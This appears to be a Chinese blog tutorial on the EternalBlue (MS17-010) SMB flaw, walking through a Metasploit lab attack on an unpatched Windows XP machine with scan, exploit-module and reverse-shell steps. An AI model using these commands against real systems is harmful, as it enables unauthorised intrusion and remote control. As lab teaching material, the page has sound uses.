本文转自行云博客https://www.xy586.top/
摘要
什么是永恒之蓝
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
这里说到了SMB协议,那么这又是啥玩意
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
前提需要
攻击机:192.168.232.131 (Kali安装Metaploit工具)
靶机:192.168.232.128 (windows xp未打永恒之蓝补丁且关闭防火墙)
原理
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞利用
本漏洞需要用到kali自带的Metasploit渗透工具,关于该工具的使用,之后再细讲。
Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编 写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。
该工具有六个模块,分别为辅助模块(auxiliary)、渗透攻击模块
(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模
块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模
块。
进入正题,打开我们的kali攻击机,启动我们的Metasploit渗透工具
msfconsole
打开另一个窗口,扫描一下靶机是否开启了445端口以及查看版本信息
nmap -sV -p 445 192.168.232.128
得到靶机的445端口信息,以及系统版本
利用msf的auxiliary模块进行漏洞验证
search ms17-010
这里我们可以使用auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞
use auxiliary/scanner/smb/smb_ms17_010
然后查看具体需要配置的东西
show options
设置攻击目标及端口
set rhosts 192.168.232.128
set rport 445
配置完后使用run命令开始测试,发现可以利用该漏洞
现在可以利用攻击模块对其进行渗透,试了多个模块后,得出exploit/windows/smb/ms17_010_psexec该漏洞可用
开始设置靶机的ip,端口以及攻击机的ip
set rhosts 192.168.232.128
set rport 445
配置完输入run进行攻击
这里需要多试几次,可能是玄学吧,成功进入
查看系统信息
捕捉屏幕screenshot
反弹shell
后续的事情就可以自由发挥了